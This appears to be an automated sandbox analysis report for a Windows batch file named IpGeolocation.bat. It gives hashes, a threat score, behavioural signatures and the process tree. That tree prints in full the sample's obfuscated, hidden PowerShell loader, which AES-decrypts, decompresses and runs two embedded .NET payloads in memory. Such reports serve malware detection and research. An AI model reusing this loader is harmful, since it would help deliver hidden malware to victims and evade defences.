Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 03:52
Static task
static1
Behavioral task
behavioral1
Sample
IpGeolocation.bat
Resource
win7-20240705-en
4 signatures
150 seconds
General
-
Target
IpGeolocation.bat
-
Size
610KB
-
MD5
624933026776b6141b7ca87c9eccb8d8
-
SHA1
d7d6388d6266360e14d7c6b56141a92053514387
-
SHA256
1bb8c8c19237b327822cc6fbc537b9c4d50c549ff15f4e71abf84a2341eec0db
-
SHA512
2d4617a578a45ee95e958fca89fbcd37882d9ca0d4b9a41e354d2901e3e19b75e9a96b7da5c9e5fdef3c9358bae06529bc3f9e2a74ae83fc3c62ae71a52f8958
-
SSDEEP
12288:M6nt5tlBhJSv4euiIl0Mhw0NbmInJpiudZtifyI72IaeYeeI:MQLlwdIyMhPnJpiWy5YdI
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 484 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 484 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1708 wrote to memory of 484 1708 cmd.exe 31 PID 1708 wrote to memory of 484 1708 cmd.exe 31 PID 1708 wrote to memory of 484 1708 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d+tjLDCPBIWMxcwncrBccwSeRNMmRhl2Y45p/urqvjk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JQ61hnvf3GQSlcjvuUmFtg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $inpxI=New-Object System.IO.MemoryStream(,$param_var); $oNRYQ=New-Object System.IO.MemoryStream; $uMrRr=New-Object System.IO.Compression.GZipStream($inpxI, [IO.Compression.CompressionMode]::Decompress); $uMrRr.CopyTo($oNRYQ); $uMrRr.Dispose(); $inpxI.Dispose(); $oNRYQ.Dispose(); $oNRYQ.ToArray();}function execute_function($param_var,$param2_var){ $dIinJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KfnHU=$dIinJ.EntryPoint; $KfnHU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat';$yTaDG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat').Split([Environment]::NewLine);foreach ($jRjNl in $yTaDG) { if ($jRjNl.StartsWith(':: ')) { $AYgTF=$jRjNl.Substring(3); break; }}$payloads_var=[string[]]$AYgTF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484
-